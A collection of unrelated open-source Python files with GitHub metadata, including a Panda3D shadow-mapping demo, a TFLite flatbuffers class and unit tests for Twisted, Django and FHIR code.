_collectWarnings(events.append, f)
self.assertEqual(len(events), 1)
self.assertEqual(events[0].message, "foo")
self.assertEqual(len(self.flushWarnings()), 1)
def test_immutableObject(self):
"""
L{_collectWarnings}'s behavior is not altered by the presence of an
object which cannot have attributes set on it as a value in
C{sys.modules}.
"""
key = object()
sys.modules[key] = key
self.addCleanup(sys.modules.pop, key)
self.test_duplicateWarningCollected()
| {
"content_hash": "09e25086098e0cccd010f5f552c4638d",
"timestamp": "",
"source": "github",
"line_count": 376,
"max_line_length": 80,
"avg_line_length": 33.57446808510638,
"alnum_prop": 0.6181083650190115,
"repo_name": "hortonworks/hortonworks-sandbox",
"id": "2a85103373ad9fbf7becbd752458aea7480c7588",
"size": "12702",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "desktop/core/ext-py/Twisted/twisted/trial/test/test_warning.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ActionScript",
"bytes": "27264"
},
{
"name": "Assembly",
"bytes": "207947"
},
{
"name": "C",
"bytes": "10279874"
},
{
"name": "C++",
"bytes": "208068"
},
{
"name": "CSS",
"bytes": "356769"
},
{
"name": "Emacs Lisp",
"bytes": "3171"
},
{
"name": "Java",
"bytes": "3064179"
},
{
"name": "JavaScript",
"bytes": "1532806"
},
{
"name": "PHP",
"bytes": "4160"
},
{
"name": "Perl",
"bytes": "139518"
},
{
"name": "Python",
"bytes": "27735073"
},
{
"name": "R",
"bytes": "12290"
},
{
"name": "Ruby",
"bytes": "5050"
},
{
"name": "Shell",
"bytes": "42062"
},
{
"name": "XSLT",
"bytes": "585"
}
],
"symlink_target": ""
} |
from panda3d.core import *
import sys,os
loadPrcFileData("", "prefer-parasite-buffer #f")
import direct.directbase.DirectStart
from direct.interval.IntervalGlobal import *
from direct.gui.DirectGui import OnscreenText
from direct.showbase.DirectObject import DirectObject
from direct.actor import Actor
from random import *
# Function to put instructions on the screen.
def addInstructions(pos, msg):
return OnscreenText(text=msg, style=1, fg=(1,1,1,1), mayChange=1,
pos=(-1.3, pos), align=TextNode.ALeft, scale = .05, shadow=(0,0,0,1), shadowOffset=(0.1,0.1))
# Function to put title on the screen.
def addTitle(text):
return OnscreenText(text=text, style=1, fg=(1,1,1,1),
pos=(1.3,-0.95), align=TextNode.ARight, scale = .07)
class World(DirectObject):
def __init__(self):
# Preliminary capabilities check.
if (base.win.getGsg().getSupportsBasicShaders()==0):
self.t=addTitle("Shadow Demo: Video driver reports that shaders are not supported.")
return
if (base.win.getGsg().getSupportsDepthTexture()==0):
self.t=addTitle("Shadow Demo: Video driver reports that depth textures are not supported.")
return
self.inst_p = addInstructions(0.95, 'P : stop/start the Panda Rotation')
self.inst_w = addInstructions(0.90, 'W : stop/start the Walk Cycle')
self.inst_t = addInstructions(0.85, 'T : stop/start the Teapot')
self.inst_l = addInstructions(0.80, 'L : move light source far or close')
self.inst_v = addInstructions(0.75, 'V: View the Depth-Texture results')
self.inst_x = addInstructions(0.70, 'Left/Right Arrow : switch camera angles')
base.setBackgroundColor(0,0,0.2,1)
base.camLens.setNearFar(1.0,10000)
base.camLens.setFov(75)
base.disableMouse()
# Load the scene.
floorTex=loader.loadTexture('maps/envir-ground.jpg')
cm=CardMaker('')
cm.setFrame(-2,2,-2,2)
floor = render.attachNewNode(PandaNode("floor"))
for y in range(12):
for x in range(12):
nn = floor.attachNewNode(cm.generate())
nn.setP(-90)
nn.setPos((x-6)*4, (y-6)*4, 0)
floor.setTexture(floorTex)
floor.flattenStrong()
self.pandaAxis=render.attachNewNode('panda axis')
self.pandaModel=Actor.Actor('panda-model',{'walk':'panda-walk4'})
self.pandaModel.reparentTo(self.pandaAxis)
self.pandaModel.setPos(9,0,0)
self.pandaModel.setScale(0.01)
self.pandaWalk = self.pandaModel.actorInterval('walk',playRate=1.8)
self.pandaWalk.loop()
self.pandaMovement = self.pandaAxis.hprInterval(20.0,Point3(-360,0,0),startHpr=Point3(0,0,0))
self.pandaMovement.loop()
self.teapot=loader.loadModel('teapot')
self.teapot.reparentTo(render)
self.teapot.setPos(0,-20,10)
self.teapot.setShaderInput("texDisable",1,1,1,1)
self.teapotMovement = self.teapot.hprInterval(50,Point3(0,360,360))
self.teapotMovement.loop()
self.accept('escape',sys.exit)
self.accept("arrow_left", self.incrementCameraPosition, [-1])
self.accept("arrow_right", self.incrementCameraPosition, [1])
self.accept("p", self.toggleInterval, [self.pandaMovement])
self.accept("P", self.toggleInterval, [self.pandaMovement])
self.accept("t", self.toggleInterval, [self.teapotMovement])
self.accept("T", self.toggleInterval, [self.teapotMovement])
self.accept("w", self.toggleInterval, [self.pandaWalk])
self.accept("W", self.toggleInterval, [self.pandaWalk])
self.accept("v", base.bufferViewer.toggleEnable)
self.accept("V", base.bufferViewer.toggleEnable)
self.accept("l", self.incrementLightPosition, [1])
self.accept("L", self.incrementLightPosition, [1])
self.accept("o", base.oobe)
self.light = render.attachNewNode(Spotlight("Spot"))
self.light.node().setScene(render)
self.light.node().setShadowCaster(True)
self.light.node().showFrustum()
self.light.node().getLens().setFov(40)
self.light.node().getLens().setNearFar(10,100)
render.setLight(self.light)
self.alight = render.attachNewNode(AmbientLight("Ambient"))
self.alight.node().setColor(Vec4(0.2, 0.2, 0.2, 1))
render.setLight(self.alight)
# Important! Enable the shader generator.
render.setShaderAuto()
# default values
self.cameraSelection = 0
self.lightSelection = 0
self.incrementCameraPosition(0)
self.incrementLightPosition(0)
# end of __init__
def toggleInterval(self, ival):
if (ival.isPlaying()):
ival.pause()
else:
ival.resume()
def incrementCameraPosition(self,n):
self.cameraSelection = (self.cameraSelection + n) % 6
if (self.cameraSelection == 0):
base.cam.reparentTo(render)
base.cam.setPos(30,-45,26)
base.cam.lookAt(0,0,0)
self.light.node().hideFrustum()
if (self.cameraSelection == 1):
base.cam.reparentTo(self.pandaModel)
base.cam.setPos(7,-3,9)
base.cam.lookAt(0,0,0)
self.light.node().hideFrustum()
if (self.cameraSelection == 2):
base.cam.reparentTo(self.pandaModel)
base.cam.setPos(-7,-3,9)
base.cam.lookAt(0,0,0)
self.light.node().hideFrustum()
if (self.cameraSelection == 3):
base.cam.reparentTo(render)
base.cam.setPos(7,-23,12)
base.cam.lookAt(self.teapot)
self.light.node().hideFrustum()
if (self.cameraSelection == 4):
base.cam.reparentTo(render)
base.cam.setPos(-7,-23,12)
base.cam.lookAt(self.teapot)
self.light.node().hideFrustum()
if (self.cameraSelection == 5):
base.cam.reparentTo(render)
base.cam.setPos(1000,0,195)
base.cam.lookAt(0,0,0)
self.light.node().showFrustum()
def incrementLightPosition(self,n):
self.lightSelection = (self.lightSelection + n) % 2
if (self.lightSelection == 0):
self.light.setPos(0,-40,25)
self.light.lookAt(0,-10,0)
self.light.node().getLens().setNearFar(10,100)
if (self.lightSelection == 1):
self.light.setPos(0,-600,200)
self.light.lookAt(0,-10,0)
self.light.node().getLens().setNearFar(10,1000)
def shaderSupported(self):
return base.win.getGsg().getSupportsBasicShaders() and \
base.win.getGsg().getSupportsDepthTexture() and \
base.win.getGsg().getSupportsShadowFilter()
World()
run()
| {
"content_hash": "3e45619f6038e8142c2c23e167f6e21d",
"timestamp": "",
"source": "github",
"line_count": 174,
"max_line_length": 117,
"avg_line_length": 39.98275862068966,
"alnum_prop": 0.6110392410521777,
"repo_name": "toontownfunserver/Panda3D-1.9.0",
"id": "9d7e6d56d9ca1d611f8569605b91f6cfaf7d5531",
"size": "6957",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "samples/Shadows/Tut-Shadow-Mapping-Basic.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1186"
},
{
"name": "C",
"bytes": "1824481"
},
{
"name": "C#",
"bytes": "8440"
},
{
"name": "C++",
"bytes": "5471478"
},
{
"name": "Emacs Lisp",
"bytes": "147093"
},
{
"name": "F#",
"bytes": "2310"
},
{
"name": "Forth",
"bytes": "506"
},
{
"name": "GLSL",
"bytes": "1040"
},
{
"name": "JavaScript",
"bytes": "7003"
},
{
"name": "MAXScript",
"bytes": "1745"
},
{
"name": "Makefile",
"bytes": "895"
},
{
"name": "Mask",
"bytes": "969"
},
{
"name": "NSIS",
"bytes": "1009441"
},
{
"name": "Objective-C",
"bytes": "15934"
},
{
"name": "Pascal",
"bytes": "4986"
},
{
"name": "Perl6",
"bytes": "30052"
},
{
"name": "Puppet",
"bytes": "259"
},
{
"name": "Python",
"bytes": "17733821"
},
{
"name": "Shell",
"bytes": "12056"
},
{
"name": "Tcl",
"bytes": "2084458"
}
],
"symlink_target": ""
} |
import logging
import os
log = logging.getLogger('no_subprocess_init')
def handle_event(event):
log.info('%s %d %s' % (__file__, os.getpid(), event))
def __sgevents_init__(dispatcher):
dispatcher.register_callback(callback=handle_event, callback_in_subprocess=False)
| {
"content_hash": "bf4e87b021d6408221a7c08b5e573ee6",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 85,
"avg_line_length": 21.615384615384617,
"alnum_prop": 0.701067615658363,
"repo_name": "westernx/sgevents",
"id": "e30447ef6e1ea2e5329f040526d62f2640fb2b12",
"size": "281",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plugins/examples/no_subprocess_init.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "56556"
},
{
"name": "Shell",
"bytes": "595"
}
],
"symlink_target": ""
} |
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class ExpandDimsOptions(object):
__slots__ = ['_tab']
@classmethod
def GetRootAsExpandDimsOptions(cls, buf, offset):
n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = ExpandDimsOptions()
x.Init(buf, n + offset)
return x
@classmethod
def ExpandDimsOptionsBufferHasIdentifier(cls, buf, offset, size_prefixed=False):
return flatbuffers.util.BufferHasIdentifier(buf, offset, b"\x54\x46\x4C\x33", size_prefixed=size_prefixed)
# ExpandDimsOptions
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
def ExpandDimsOptionsStart(builder): builder.StartObject(0)
def ExpandDimsOptionsEnd(builder): return builder.EndObject()
class ExpandDimsOptionsT(object):
# ExpandDimsOptionsT
def __init__(self):
pass
@classmethod
def InitFromBuf(cls, buf, pos):
expandDimsOptions = ExpandDimsOptions()
expandDimsOptions.Init(buf, pos)
return cls.InitFromObj(expandDimsOptions)
@classmethod
def InitFromObj(cls, expandDimsOptions):
x = ExpandDimsOptionsT()
x._UnPack(expandDimsOptions)
return x
# ExpandDimsOptionsT
def _UnPack(self, expandDimsOptions):
if expandDimsOptions is None:
return
# ExpandDimsOptionsT
def Pack(self, builder):
ExpandDimsOptionsStart(builder)
expandDimsOptions = ExpandDimsOptionsEnd(builder)
return expandDimsOptions
| {
"content_hash": "22ee35764d78c81e71c8e72627d0598e",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 114,
"avg_line_length": 29.14814814814815,
"alnum_prop": 0.6899618805590851,
"repo_name": "google-research/falken",
"id": "f9fec78d950a19d252a5b53c9d51f2397265f1a9",
"size": "2242",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "service/generated_flatbuffers/tflite/ExpandDimsOptions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "27651"
},
{
"name": "C#",
"bytes": "673937"
},
{
"name": "C++",
"bytes": "1250409"
},
{
"name": "CMake",
"bytes": "133649"
},
{
"name": "Java",
"bytes": "6034"
},
{
"name": "JavaScript",
"bytes": "112279"
},
{
"name": "Objective-C++",
"bytes": "4177"
},
{
"name": "Python",
"bytes": "1666229"
},
{
"name": "SWIG",
"bytes": "27937"
},
{
"name": "ShaderLab",
"bytes": "1473"
},
{
"name": "Shell",
"bytes": "8257"
}
],
"symlink_target": ""
} |
from . import HermesTestCase
from .. import models
class CategoryTestCase(HermesTestCase):
def test_is_root(self):
"""A Category should know if it is the root category"""
expected = True
self.assertEqual(expected, self.root_category.is_root)
expected = False
self.assertEqual(expected, self.second_category.is_root)
expected = False
self.assertEqual(expected, self.third_category.is_root)
def test_hierarchy(self):
"""A Category should know it's hierarchy"""
expected = [self.root_category, ]
self.assertEqual(expected, self.root_category.hierarchy())
expected = [self.root_category, self.second_category, ]
self.assertEqual(expected, self.second_category.hierarchy())
expected = [self.root_category, self.second_category, self.third_category, ]
self.assertEqual(expected, self.third_category.hierarchy())
def test_parents(self):
"""A Category should know its parents"""
expected = []
self.assertEqual(expected, self.root_category.parents())
expected = [self.root_category, ]
self.assertEqual(expected, self.second_category.parents())
expected = [self.root_category, self.second_category, ]
self.assertEqual(expected, self.third_category.parents())
def test_root_parent(self):
"""A Category should know its top-most parent"""
expected = self.root_category
self.assertEqual(expected, self.root_category.root_parent())
self.assertEqual(expected, self.second_category.root_parent())
self.assertEqual(expected, self.third_category.root_parent())
expected = self.another_category
self.assertEqual(expected, self.another_category.root_parent())
def test_generate_slug(self):
"""A Category should know how to generate its slug"""
expected = u'programming'
self.assertEqual(expected, self.root_category._generate_slug())
expected = u'programming/python'
self.assertEqual(expected, self.second_category._generate_slug())
expected = u'programming/python/django'
self.assertEqual(expected, self.third_category._generate_slug())
def test_unicode(self):
"""A Category should have a unicode representation"""
expected = u'Programming'
self.assertEqual(expected, self.root_category.__unicode__())
expected = u'Programming > Python'
self.assertEqual(expected, self.second_category.__unicode__())
expected = u'Programming > Python > Django'
self.assertEqual(expected, self.third_category.__unicode__())
def test_get_absolute_url(self):
"""A Category should know its absolute URL"""
expected = u'/blog/categories/programming/'
self.assertEqual(expected, self.root_category.get_absolute_url())
expected = u'/blog/categories/programming/python/'
self.assertEqual(expected, self.second_category.get_absolute_url())
expected = u'/blog/categories/food/'
self.assertEqual(expected, self.another_category.get_absolute_url())
def test_save(self):
"""A Category should update its slug on save"""
self.third_category.slug = u"Banana Slug"
self.third_category.save()
expected = u'programming/python/django'
self.assertEqual(expected, self.third_category.slug)
class CategoryManagerTestCase(HermesTestCase):
def test_children_of(self):
"""The Category Manager should know the children of a Category"""
expected = [self.second_category, self.third_category, ]
self.assertEqual(expected, models.Category.objects.children_of(self.root_category))
expected = [self.third_category, ]
self.assertEqual(expected, models.Category.objects.children_of(self.second_category))
def test_children_of_leaf(self):
"""The Category Manager should know that a leaf Category has no children"""
expected = []
self.assertEqual(expected, models.Category.objects.children_of(self.third_category))
| {
"content_hash": "a648acbe08bd7027ec4a1f9d16d73a04",
"timestamp": "",
"source": "github",
"line_count": 103,
"max_line_length": 93,
"avg_line_length": 39.85436893203884,
"alnum_prop": 0.6728380024360536,
"repo_name": "emilian/django-hermes",
"id": "9a83fc4240058f510cdb890c2f13d965a86c3a9b",
"size": "4105",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hermes/tests/test_category_model.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "68844"
}
],
"symlink_target": ""
} |
import os
import io
import unittest
import json
from . import operationdefinition
from .fhirdate import FHIRDate
class OperationDefinitionTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("OperationDefinition", js["resourceType"])
return operationdefinition.OperationDefinition(js)
def testOperationDefinition1(self):
inst = self.instantiate_from("operationdefinition-example.json")
self.assertIsNotNone(inst, "Must have instantiated a OperationDefinition instance")
self.implOperationDefinition1(inst)
js = inst.as_json()
self.assertEqual("OperationDefinition", js["resourceType"])
inst2 = operationdefinition.OperationDefinition(js)
self.implOperationDefinition1(inst2)
def implOperationDefinition1(self, inst):
self.assertEqual(inst.base, "OperationDefinition/Questionnaire-populate")
self.assertEqual(inst.code, "populate")
self.assertEqual(inst.comment, "Only implemented for Labs and Medications so far")
self.assertEqual(inst.contact[0].name, "System Administrator")
self.assertEqual(inst.contact[0].telecom[0].system, "email")
self.assertEqual(inst.contact[0].telecom[0].value, "[email protected]")
self.assertEqual(inst.date.date, FHIRDate("2015-08-04").date)
self.assertEqual(inst.date.as_json(), "2015-08-04")
self.assertEqual(inst.description, "Limited implementation of the Populate Questionnaire implementation")
self.assertEqual(inst.id, "example")
self.assertTrue(inst.instance)
self.assertEqual(inst.jurisdiction[0].coding[0].code, "GB")
self.assertEqual(inst.jurisdiction[0].coding[0].display, "United Kingdom of Great Britain and Northern Ireland (the)")
self.assertEqual(inst.jurisdiction[0].coding[0].system, "urn:iso:std:iso:3166")
self.assertEqual(inst.kind, "operation")
self.assertEqual(inst.name, "Populate Questionnaire")
self.assertEqual(inst.overload[0].parameterName[0], "subject")
self.assertEqual(inst.overload[0].parameterName[1], "local")
self.assertEqual(inst.overload[1].comment, "local defaults to false when not passed as a parameter")
self.assertEqual(inst.overload[1].parameterName[0], "subject")
self.assertEqual(inst.parameter[0].max, "1")
self.assertEqual(inst.parameter[0].min, 1)
self.assertEqual(inst.parameter[0].name, "subject")
self.assertEqual(inst.parameter[0].type, "Reference")
self.assertEqual(inst.parameter[0].use, "in")
self.assertEqual(inst.parameter[1].documentation, "If the *local* parameter is set to true, server information about the specified subject will be used to populate the instance.")
self.assertEqual(inst.parameter[1].max, "1")
self.assertEqual(inst.parameter[1].min, 0)
self.assertEqual(inst.parameter[1].name, "local")
self.assertEqual(inst.parameter[1].type, "Reference")
self.assertEqual(inst.parameter[1].use, "in")
self.assertEqual(inst.parameter[2].documentation, "The partially (or fully)-populated set of answers for the specified Questionnaire")
self.assertEqual(inst.parameter[2].max, "1")
self.assertEqual(inst.parameter[2].min, 1)
self.assertEqual(inst.parameter[2].name, "return")
self.assertEqual(inst.parameter[2].type, "QuestionnaireResponse")
self.assertEqual(inst.parameter[2].use, "out")
self.assertEqual(inst.publisher, "Acme Healthcare Services")
self.assertEqual(inst.resource[0], "Questionnaire")
self.assertEqual(inst.status, "draft")
self.assertFalse(inst.system)
self.assertEqual(inst.text.status, "generated")
self.assertFalse(inst.type)
self.assertEqual(inst.url, "http://h7.org/fhir/OperationDefinition/example")
self.assertEqual(inst.useContext[0].code.code, "venue")
self.assertEqual(inst.useContext[0].code.display, "Clinical Venue")
self.assertEqual(inst.useContext[0].code.system, "http://build.fhir.org/codesystem-usage-context-type")
self.assertEqual(inst.useContext[0].valueCodeableConcept.coding[0].code, "IMP")
self.assertEqual(inst.useContext[0].valueCodeableConcept.coding[0].display, "inpatient encounter")
self.assertEqual(inst.useContext[0].valueCodeableConcept.coding[0].system, "http://terminology.hl7.org/CodeSystem/v3-ActCode")
self.assertEqual(inst.version, "B")
| {
"content_hash": "413e22cc81f8f3a2df8262d968e697a7",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 187,
"avg_line_length": 59.822784810126585,
"alnum_prop": 0.7010156580617859,
"repo_name": "all-of-us/raw-data-repository",
"id": "9d4fac102ca0c61d4f15334207372cdb1fe8c9ef",
"size": "4857",
"binary": false,
"copies": "1",
"ref": "refs/heads/devel",
"path": "rdr_service/lib_fhir/fhirclient_4_0_0/models/operationdefinition_tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "1866"
},
{
"name": "Mako",
"bytes": "1715"
},
{
"name": "Python",
"bytes": "17040924"
},
{
"name": "R",
"bytes": "2212"
},
{
"name": "Shell",
"bytes": "92213"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django_extensions.management.commands.print_settings import Command
def test_without_args(capsys):
print_settings = Command()
print_settings.run_from_argv(['manage.py', 'print_settings'])
out, err = capsys.readouterr()
assert 'DEBUG' in out
assert 'INSTALLED_APPS' in out
def test_with_setting_args(capsys):
print_settings = Command()
print_settings.run_from_argv(['manage.py', 'print_settings', 'DEBUG'])
out, err = capsys.readouterr()
assert 'DEBUG' in out
assert 'INSTALLED_APPS' not in out
def test_with_multiple_setting_args(capsys):
print_settings = Command()
print_settings.run_from_argv([
'manage.py',
'print_settings',
'SECRET_KEY',
'DATABASES',
'INSTALLED_APPS',
])
out, err = capsys.readouterr()
assert 'DEBUG' not in out
assert 'SECRET_KEY' in out
assert 'DATABASES' in out
assert 'INSTALLED_APPS' in out
def test_format(capsys):
print_settings = Command()
print_settings.run_from_argv([
'manage.py',
'print_settings',
'DEBUG',
'--format=text',
])
out, err = capsys.readouterr()
expected = 'DEBUG = False\n'
assert expected == out
def test_format_json_without_indent(capsys):
print_settings = Command()
print_settings.run_from_argv([
'manage.py',
'print_settings',
'DEBUG',
'--format=json',
'--indent=0',
])
expected = '{\n"DEBUG": false\n}\n'
out, err = capsys.readouterr()
assert expected == out
| {
"content_hash": "f652d1c6d17f61a6d8f99d5b5a253254",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 74,
"avg_line_length": 23.925373134328357,
"alnum_prop": 0.6150966936993137,
"repo_name": "linuxmaniac/django-extensions",
"id": "1cb491a1558f9b232b2237a6e9ddf5e0ef39e79f",
"size": "1627",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/management/commands/test_print_settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "740"
},
{
"name": "HTML",
"bytes": "2252"
},
{
"name": "JavaScript",
"bytes": "41410"
},
{
"name": "Makefile",
"bytes": "1294"
},
{
"name": "Python",
"bytes": "604449"
}
],
"symlink_target": ""
} |
Subsets and Splits